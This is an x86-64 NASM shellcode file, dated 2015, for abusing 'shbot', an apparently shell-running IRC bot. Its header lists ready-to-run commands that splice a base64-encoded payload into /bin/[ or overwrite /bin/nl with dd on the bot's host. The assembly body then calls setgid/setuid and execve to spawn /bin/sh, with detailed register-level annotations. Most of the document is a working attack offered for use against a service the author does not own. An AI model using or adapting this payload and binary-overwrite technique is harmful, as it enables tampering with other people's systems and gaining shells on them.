; su in x86-64 for abusing shbot on irc.freenode.org/#bash.
; we overwrite the .text section of a donor binary with our code to save writing a big ELF header.
; mute (m@san.aq) 07jul2015. public domain.
; 1. get offset for target binary
; (/bin/nl is 6288 and /bin/[ is 5696; good luck getting other binaries off shbot)
; objdump -h ~/nl.shbot | awk '/text/{print "ibase=16;"toupper($6)}' | bc
; 2. build this file with nasm
; nasm -f bin su su.asm
; 3. get base64 encoded
; base64 -w 0 ./su
; 4. run on shbot
; # cd /bin;(head -c5696;read -N33;recode /64<<<VlJmv/7/McCwag8FsGkPBVpeSLsvYmluLy9zaDHAUFNIieewOw8F;cat)>tr<[;tr -c id
; # recode /64<<<VlJmv/7/McCwag8FsGkPBVpeSLsvYmluLy9zaDHAUFNIieewOw8F|2<&-dd of=/bin/nl bs=8 seek=786 conv=notrunc;nl -c id
BITS 64
;-----------------------------------------------------------------------
; Payload body (NASM, Intel syntax, flat binary).
; ABI:  Linux x86-64 raw syscall convention: rax = number, args in rdi,
;       rsi, rdx; the kernel clobbers only rax, rcx, r11.
; Net effect: setgid(65534); setuid(65534); execve("/bin//sh", argv, envp)
;       where argv/envp are whatever the donor process was started with.
;       Neither set*id result is checked, so the execve runs regardless.
; Entry state: this blob replaces the start of the donor's .text, so the
;       registers it sees are what the donor's entry path left there. The
;       author assumes the C main() shape below -- not verified here.
; Clobbers: rbx (callee-saved, but the process image is replaced anyway).
; Observable behaviour: the donor (e.g. nl) calling setgid/setuid(65534)
;       and then execve of /bin//sh with its own argv.
;-----------------------------------------------------------------------
; main(rdi=argc, rsi=argv, rdx=envp)      -- author's assumption
push rsi ; argv  (saved across the syscalls; syscall leaves rsi intact, so this is belt-and-braces)
push rdx ; envp  (same)
; mov rdi, 65534                          -- 7-byte form the author replaced with the 4-byte one below
mov di, 65534 ; 16-bit write: only the low 16 bits of rdi are set; the upper 48 bits
              ; keep whatever rdi held on entry (assumed zero because argc is small)
xor eax, eax
mov al, 106 ; setgid(%rdi)  -- 106 = __NR_setgid on x86-64; 65534 is conventionally nobody/nogroup
syscall
; mov rdi, 65534                          -- not needed: syscall preserves rdi, still 65534
mov al, 105 ; setuid(%rdi)  -- 105 = __NR_setuid
            ; NOTE(review): only the low byte of rax is rewritten, so rax equals 105 only
            ; when the preceding setgid returned 0; a -errno return leaves the upper bytes
            ; set and this syscall number is then not a valid one (setuid is skipped silently)
syscall
pop rdx ; envp
pop rsi ; argv
mov rbx, '/bin//sh' ; exactly 8 bytes: the doubled slash pads the path so the immediate needs no NUL
xor eax, eax
push rax ; null-terminate program name  (8 zero bytes land just above the path on the stack)
push rbx ; /bin//sh  (rsp now points at "/bin//sh" followed by the zero qword)
mov rdi, rsp ; program
mov al, 0x3b ; execve(program,argv,envp)  -- 0x3b = 59 = __NR_execve; rax upper bytes are zero here
             ; argv/envp are passed through unchanged, so the shell receives the donor's own
             ; arguments (which is why the usage lines above invoke the patched binary with -c id)
syscall